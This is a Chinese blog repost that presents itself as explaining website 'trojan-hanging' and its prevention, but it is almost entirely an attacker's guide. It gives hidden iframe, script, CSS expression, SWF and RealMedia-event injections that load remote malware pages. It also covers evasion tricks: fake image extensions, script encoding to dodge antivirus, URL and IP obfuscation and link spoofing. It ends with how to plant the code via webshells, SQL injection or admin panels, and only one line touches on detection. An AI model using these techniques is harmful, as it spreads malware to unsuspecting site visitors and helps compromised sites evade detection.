了解常用的集中網(wǎng)站掛馬和防范方法

今天在arthack網(wǎng)站看到一篇很不錯的文章，原文標(biāo)題為“知曉掛馬常用方法，杜絕掛馬”，icech轉(zhuǎn)載一下，原文地址在文章下方。

1、掛馬的N種方法

(1) HTML掛馬法。

常規(guī)的HTML掛馬方法一般是在網(wǎng)頁中插入一條iframe語句，像<iframe src=http://www.arthack.org/horse.html width=0 height=0></iframe>。查看站點是否被掛，一般是查找一下關(guān)鍵詞iframe。

(2) 再隱藏一點的就是js掛馬了。

像再原來的網(wǎng)頁中寫入<script str=http://www.arthack.org/horse.js></script> ，horse里的js寫法一般為 document.write(’http:\/\/www.arthack.org\/horse.html’>;，或者專業(yè)一點的寫法是 top.document.body.innerHTML = top.document.body.innerHTML + ‘\r\n<inframe src=http://www.zw361.com/horse.htm/”></iframe>”;。不過第2種寫法要注意：是原來的網(wǎng)頁種要有body標(biāo)簽。

3) 在 css中掛馬。

這個方法就是在css中寫入
body {
hytop:expression(top.document.body.innerHTML = top.document.body.innerHTML + ‘\r\n<iframe src=http://www.xxx.com/horse.html/”></iframe>’);
}

然后在主頁中調(diào)用這個CSS，代碼類似http://www.arthack.org/css.css” rel=”stylesheet” type=”text/css”>這樣的。在csdn 中對expression的解釋是：IE5及其以后版本支持在CSS中使用expression，用來吧CSS屬性和javascript表達式關(guān)聯(lián)起來，這里的CSS屬性可以是元素固有的屬性，也可以是自定義屬性。也就是說CSS屬性后面可以是一段Javasccript表達式，CSS屬性的值等于 javascript表達式計算的結(jié)果。在表達式中可以是直接一用元素自身的屬性和方法，也可以使用其它瀏覽器對象。這個表達式就好像是在這個元素的一個成員函數(shù)中一樣。整個解釋關(guān)鍵點是expression可以在css中引入js語句，所以我們可用于掛馬。不過寫的語句值可以遠程調(diào)用，本地不可以。

(4) 在swf中掛馬

網(wǎng)上有一些swf掛馬的工具，可以用工具替換原來網(wǎng)頁中的swf或單獨把swf發(fā)給對方，一可以單獨作一個可顯示swf頁的網(wǎng)頁。在網(wǎng)頁中插入swf的語法一般格式為：

<OBJECT classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5.0.0.0 WIDTH=760 NAME=quality VALUE=high> <EMBED src=http://www.arthack.org/xxx.swf” quality=high pluginspage=http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash type=application/x-shockwave-flash width=760 height=60></EMBED></OBJECT>

(5) 在影音文件中掛馬。

所需工具是RealMedia Editor，打開工具后，然后依次選擇”文件”-”打開Real媒體文件”，然后選擇需要編輯的視頻文件，其格式必須是RealOne公司的以RM或 RMVB為擴展名的文件。接著，新建一個文本，在里面輸入u 00:00:10:0 00:00:30.0&&_rpexternal& http://www.arthack.org/horse.htm (00:00:10.0就是發(fā)生第一事件的時間，這里是讓計算機彈出網(wǎng)頁;00:00:30.0同樣，這是第二次發(fā)生的時間，在0時0分第30秒0微妙時彈出窗口;而后面的URL地址就是連接指定的木馬地址。)

輸入完畢后并保存，然后依次選擇”工具”-”合并事件”，導(dǎo)入剛才的文本。當(dāng)合并完成后，依次選擇”文本”-”Real文件另存為”，保存好即可。

最后把生成的視頻文件發(fā)布網(wǎng)上，當(dāng)對方觀看同時就會連接到你指定的木馬地址

2、掛馬的技巧

掛馬首先要求的是隱蔽性，這樣掛的時間才能長。像在SWF、JS、RM中掛馬就是比較隱蔽了，但是還可再用到些技巧。

(1)遠程任意后綴執(zhí)行HTML

可以把horse.html改成horse.jpg之類的后綴，然后語句寫成<iframesrc=/uploadfile/200902 /20090220105353594.jpg width=0 height=0></iframe>。js也可以，語句為<script src=/uploadfile/200902/20090220105353594.jpg></script>，甚至js的不要后綴名都可以。

2)JS的加密

為了保護網(wǎng)頁木馬的代碼，可以把JS內(nèi)容加密，還能躲開殺軟的作用。如果使用ENCODE加密方式，加密后的JS調(diào)用語句就用<scriptlanguage=”jscript”.encode”src=http://www.arthack.org/horse.txt& gt;</script>。除此方法外，還有其它更多的方法！

(3)URL的變形

URL的變形方法也有很多，例如將url的16進制轉(zhuǎn)換為encod編碼等。如果是涉及到URL欺騙的方法就更多了，不過多數(shù)的URL欺騙，像利用@的技巧，IE都已經(jīng)打補丁了。但現(xiàn)在有個漏洞仍然有效，代碼如下：
<a id=”CZY” href=http://www.arthack.org”></a>
<div>
<a href=http://www.google.cn” target=”_blank”>
<table>
<caption>
<a href=http://www.google.cn” target=”_blank”>
<label for=”CZY”>
<u style=”cursor: pointer: color: blue”>
Google</u>
</label></a></caption></table></a></div>

保存該代碼為網(wǎng)頁后，鼠標(biāo)移動到Google這個鏈接上時，IE狀態(tài)欄顯示的http://www.google.cn，但點擊鏈接后卻打開 http://www.arthack.org網(wǎng)站。如果你的網(wǎng)馬可以用IP地址訪問到的話，IP地址也可以進行轉(zhuǎn)換的。像127.0.0.1這樣的IP 還可以 變?yōu)?2130706433、0×7f.0×00.0×00.0×01、0177.0000.0000.0001等等，這只不過是8進制、10進制、16進制、的轉(zhuǎn)換而已。

3、如何才能掛到馬

拿到了webshell的話，掛馬自然是很簡單了。但是拿不到的情況下，如果注入點有update權(quán)限，我們可以仔細查找首頁中的某條新聞的調(diào)用鏈接，然后update數(shù)據(jù)庫達到我們的目的。如果可進入后臺，我沒就可以在一些發(fā)公告的地方寫入自己的木馬代碼(不過千萬別打亂前臺html源文件里的代碼邏輯)。

原文地址：http://www.arthack.org/trojaned.html